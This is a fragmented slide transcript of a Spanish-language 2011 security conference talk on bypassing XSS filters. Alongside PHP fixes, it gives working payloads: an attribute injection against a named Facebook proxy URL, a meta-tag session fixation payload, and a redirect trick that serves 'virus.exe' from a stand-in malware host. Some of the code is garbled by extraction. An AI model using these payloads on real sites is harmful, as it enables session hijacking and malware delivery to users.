lima hack 2011
TRANSCRIPT
aula Steve JobsC
amilo
Gald
os
AkA
Dr.W
hite
Bypassing Xss Filters¿Sentiste alguna vez que no había
Vulnerabilidad alguna en un sitio web?Hoy te enseñaré como saltar filtros para
Expl0tar Xss :)
¿Xss?
Cross Site Scripting , básicamente es un tipo de(in)seguridad Informática mediante la cual podemosejecutar códigos de script ya sea JavaScript oVBScript.
$_GET[‘vuln’];
Explotando Xss en variables por Método Get:
http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fi55.tinypic.com%2F29y02nr.jpg
http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2F3.bp.blogspot.com%2F-fZREhbOB7fY%2FTnDcigl9ubI%2FAAAAAAAAASo%2FG0aFyPYcfrY%2Fs320%2Flimahack2011.jpg
Código Fuente
<img src = “http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg” />
Firewall Detected
http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2Fkarebu.com%2Fimages%2Flogo%2Fdark%2FLogotipo2.png
Usando el… “Sentido Hacker”
http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2F3.bp.blogspot.com%2F-fZREhbOB7fY%2FTnDcigl9ubI%2FAAAAAAAAASo%2FG0aFyPYcfrY%2Fs320%2Flimahack2011.jpg”
<img src = “http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg” focus();“ />
Ahora por dentro… Fixing
<?php$v = $_GET*‘var’+;?>
____________Repaired______________
<?php$v = htmlspecialchars($_GET*‘var’+);?>
- Str_replace();- htmlentities();- proper_func();- etc();
$_POST[‘vuln’];
Bueno ahora toca expl0tar por el lado del método POST, en este caso las variables están ocultas no las vemos a menos que usemos una tool puede ser Live Http Headers pero el bug sigue estando en un .php único.
http://exploitingexample.com/load.php Ese será el ejemplo.
Código Fuente
$name = $_POST['name'];
<input name=“name" id=“name" type="text" class="inputbox" alt="nombre" size="18" />
Echo $name;
Fixing…
$name = htmlspecialchars($_POST['name']);
En un Form no deben escribir nunca los datos que ingresaron en un txt y para validación, Usen Jquery.
$_SERVER['PHP_SELF']
<form action="<?=$_SERVER['PHP_SELF']?>" method=POST>
http://mybugsweb.com/contacto.php
¿404?
http://mybugsweb.com/contacto.php<script>alert(1);</script>
http://mybugsweb.com/contacto.php/”><script>alert(1);</script>
Fixing!
<form action=“Contacto.php" method=POST>
<form action="" method=POST>
if(isset($_POST['contactar']))
A Volvernos Malos >:)
http://mybugsweb.com/contacto.php/"><meta http-equiv=Set-Cookie content='sesfix=unmd5();; Expires=Tuesday,15-Nov-2012 00:00:00 GMT”; domain=.bugged.com'>
Session Fixation!!! Se Loguea y PWNED
A Volvernos Malos >:)
http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fmalwaremaker.com%2Fvirus.jpg
redirect 301 /virus.jpg /virus.exe
http://www.facebook.com/l.php?u=http://www.facebook.com/l.php?u=http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fgoogle.com%2logo.jpg”focus();&h=bAQFltC-7AQGdPe9w-LWlzh7JWFqTsIqGeW2octoqiMV4sg
Gracias por participarmuy pronto estamos en provincias
para más información ingresa a nuestra web
En el 2012 mucho más de nosotros…
[email protected] – @SeguridadBlanca